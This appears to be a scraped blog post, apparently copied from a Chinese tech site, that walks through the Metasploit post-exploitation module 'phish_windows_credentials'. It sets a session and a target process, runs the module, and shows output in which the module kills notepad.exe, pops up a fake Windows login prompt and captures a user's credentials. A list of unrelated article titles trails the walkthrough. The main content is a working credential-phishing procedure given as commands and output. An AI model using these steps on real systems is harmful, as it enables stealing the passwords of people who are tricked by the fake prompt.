Windows Gather User Credentials (phishing)
来源:互联网 发布:大华ipc onvif协议端口 编辑:程序博客网 时间:2024/06/05 01:50
Description:
This module is able to perform a phishing attack on the target by
popping up a loginprompt. When the user fills credentials in the
loginprompt, the credentials will be sent to the attacker. The
module is able to monitor for new processes and popup a loginprompt
when a specific process is starting. Tested on Windows 7.
When notepad.exe is opened in target machine, there will be a login manager window. If you provide the right password, notepad window will appear, or it will continue until you hate it.
msf post(phish_windows_credentials) > show options Module options (post/windows/gather/phish_windows_credentials): Name Current Setting Required Description ---- --------------- -------- ----------- DESCRIPTION {PROCESS_NAME} needs your permissions to start. Please enter user credentials yes Message shown in the loginprompt PROCESS no Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes) SESSION yes The session to run this module on.msf post(phish_windows_credentials) > set SESSION 1SESSION => 1msf post(phish_windows_credentials) > set PROCESS notepad.exePROCESS => notepad.exemsf post(phish_windows_credentials) > run[+] PowerShell is installed.[*] Monitoring new processes.[*] notepad.exe is already running. Waiting on new instances to start[*] notepad.exe is already running. Waiting on new instances to start[*] notepad.exe is already running. Waiting on new instances to start[*] New process detected: 1040 notepad.exe[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...[+] #< CLIXML[+] [+] UserName Domain Password -------- ------ -------- nfs nfs-001
[1].https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
[2].https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb
[3].https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1
- Windows Gather User Credentials (phishing)
- http://sourceforge.net/p/keepass/wiki/Recover%20Windows%20User%20Account%20Credentials/
- User Credentials CommandDialog with SecureString password
- "MONGODB-CR credentials missing in the user document"的解决办法
- Security Tutorials系列文章第六章:Validating User Credentials Against the Membership User Store
- Becoming an WPA Xpert Part 12: Timing User Login Credentials (Sometimes it IS the user)
- Enumerating Windows credentials with CredEnumerate function (Windows XP/2003 Only)
- JavaScript Phishing
- jQuery.Phishing
- Office Phishing
- JavaScript Phishing
- Host Credentials报错"Connection to host as user oracle failed: ERROR: Wrong password for user"的解决一例
- Example of email Phishing
- 网络钓鱼 phishing
- Phishing with Unicode Domains
- twisted-credentials
- Windows Create Hide User
- Oracle HowTo:如何在Windows系统中设置EM的Database Preferred Credentials
- discuz论坛通过程序插入帖子
- 使用libcurl实现的下载器
- POJ 3461 Oulipo (KMP模板题)
- C++ STL简介
- UOJ #34 多项式乘法 FFT快速傅立叶变换
- Windows Gather User Credentials (phishing)
- SQL基础(廿二)---UNION ALL
- HTTP协议缓存策略深入详解之etag妙用
- javafX8初探(滑块)
- [每天一个知识点]26-软件工程-有多少管理是为了满足管理者的掌控感
- Restore openstack after ip address changed
- 线程的两种实现方式
- H5页面点击按钮时的loading图
- 左连接使用